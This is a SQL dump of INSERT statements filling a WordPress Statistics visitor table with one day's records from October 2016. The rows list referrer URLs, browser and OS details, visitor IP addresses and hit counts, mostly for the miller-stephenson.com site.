INSERT INTO `wp_statistics_visitor` VALUES (7226, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '162.216.46.28', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7227, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.74.90.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7228, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.50.0.236', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7229, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '167.249.161.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7230, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.66.129.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7231, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.83.193.208', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7232, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.134.6.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7233, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.79.127.168', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7234, '2016-10-20', 'https://forums.pelicanparts.com/911-engine-rebuilding-forum/284737-complete-engine-sealant-thread-16.html', 'Chrome', 'Android', '53.0.2785.124', '', '176.92.219.240', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7235, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjxyevOvunPAhXEwj4KHYHqDQEQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '198.175.154.212', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7236, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.209.75.178', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7237, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.98.136.207', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7238, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '160.179.12.145', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7239, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.102.196.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7240, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.199.65.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7241, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.86.38.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7242, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.206.81.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7243, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.129.55.153', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7244, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.177.27.104', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7245, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.29.130.231', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7246, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.124.54.53', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7247, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.177.197.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7248, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.144.174.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7249, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.234.117.217', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7250, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '160.177.55.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7251, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.20.194.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7252, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.136.53.178', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7253, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.78.149.32', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7254, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.159.225.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7255, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.250.5.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7256, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.220.23.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7257, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.243.22.94', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7258, '2016-10-20', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '97.65.66.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7259, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '193.34.93.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7260, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.77.218.169', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7261, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.195.224.203', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7262, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.186.3.33', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7263, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.153.131.236', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7264, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.238.67.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7265, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.98.95.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7266, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.54.79.237', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7267, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.70.132.119', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7268, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '131.59.200.80', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7269, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.167.253.254', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7270, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.28.95.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7271, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '146.255.231.14', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7272, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.109.173.223', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7273, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.238.47.95', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7274, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.148.44.235', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7275, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7276, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.104.237.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7277, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '107.10.197.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7278, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.253.50.239', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7279, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.231.126.7', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7280, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.6.76.205', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7281, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.15.217.33', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7282, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.107.80.243', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7283, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.95.103.249', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7284, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.14.236.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7285, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '38.104.229.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7286, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.69.154.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7287, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.183.164.104', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7288, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.161.241.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7289, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '168.227.84.57', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7290, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.234.16.53', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7291, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.144.121.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7292, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.204.253.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7293, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.32.43.60', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7294, '2016-10-20', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '12.49.238.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7295, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.44.109.210', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7296, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.154.222.242', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7297, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.109.200.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7298, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.61.211.54', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7299, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.144.179.158', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7300, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '114.143.137.33', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7301, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.190.91.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7302, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.252.163.59', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7303, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.138.62.55', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7304, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.76.210.142', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7305, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.103.18.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7306, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '211.192.159.55', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7307, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '88.87.95.88', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7308, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '69.118.179.227', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7309, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.147.15.67', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7310, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '51.235.216.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7311, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.205.75.227', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7312, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.98.52.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7313, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.126.253.204', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7314, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.94.205.186', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7315, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.222.89.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7316, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '36.0', '', '45.40.253.251', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7317, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.146.70.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7318, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '179.43.206.57', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7319, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '70.71.155.172', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7320, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '67.161.41.224', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7321, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.153.228.233', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7322, '2016-10-20', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '12.36.65.130', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7323, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.94.191.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7324, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.183.128.214', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7325, '2016-10-20', 'https://localhost:5272/067R154L115A10020140825.xhtml', 'SynHttpClient-Built', 'Unknown', '5865', '', '67.154.115.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7326, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.80.161.33', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7327, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.201.191.175', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7328, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.106.209.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7329, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.69.193.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7330, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.210.91.70', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7331, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '1.162.47.159', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7332, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.105.2.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7333, '2016-10-20', 'https://www.google.com.mx/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjNwI-YxunPAhWMPD4KHZELB4UQFggtMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fconformal-coatings%2F&usg=AFQjCNF6BrACSYYrQwxy3XIrHbh4DG7M6A', 'MSIE', 'Windows', '11.0', '', '64.88.201.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7334, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.167.20.44', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7335, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.116.191.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7336, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.140.154.136', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7337, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '127.0.0.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7338, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '99.242.43.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7339, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.190.93.184', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7340, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.134.203.215', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7341, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '51.37.168.251', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7342, '2016-10-20', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '66.231.41.83', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7343, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.63.20.250', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7344, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.102.136.18', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7345, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '60.96.134.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7346, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.21.0.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7347, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.74.43.47', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7348, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.190.94.125', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7349, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.68.76.61', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7350, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '118.136.188.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7351, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.72.122.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7352, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '104.240.103.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7353, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '47.29.173.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7354, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.46.134.90', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7355, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.40.83.143', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7356, '2016-10-20', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiq_r3Sx-nPAhUMjmkKHfJwDeUYABAA&sig=AOD64_2iJtEHt1I-gUPXZJ1KVRp755As7A&rct=j&q=&ved=0ahUKEwj45rrSx-nPAhVs6YMKHVnFDCIQ0QwIHA&adurl=', 'MSIE', 'Windows', '11.0', '', '207.218.46.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7357, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.147.112.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7358, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.87.230.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7359, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.190.67.189', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7360, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.157.78.172', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7361, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.186.100.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7362, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.50.131.96', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7363, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiw7_qeyOnPAhXF8CYKHYGBC8QQFggkMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-381h%2F&usg=AFQjCNHPoQ9MpQV1ijXeJgQc8XYPNRRqjw&bvm=bv.136499718,d.eWE', 'MSIE', 'Windows', '11.0', '', '158.147.92.151', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7364, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.83.25.184', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7365, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '120.56.205.235', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7366, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.125.250.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7367, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '193.59.58.128', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7368, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.60.156.178', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7369, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.184.89.70', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7370, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.1.54.252', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7371, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '208.114.63.4', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7372, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.30.76.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7373, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.176.142.133', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7374, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.86.222.124', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7375, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.219.0.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7376, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.22.124.104', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7377, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.74.9.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7378, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '193.219.164.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7379, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.223.3.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7380, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.67.92.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7381, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.221.8.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7382, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.147.114.255', '000', 3, 0); 
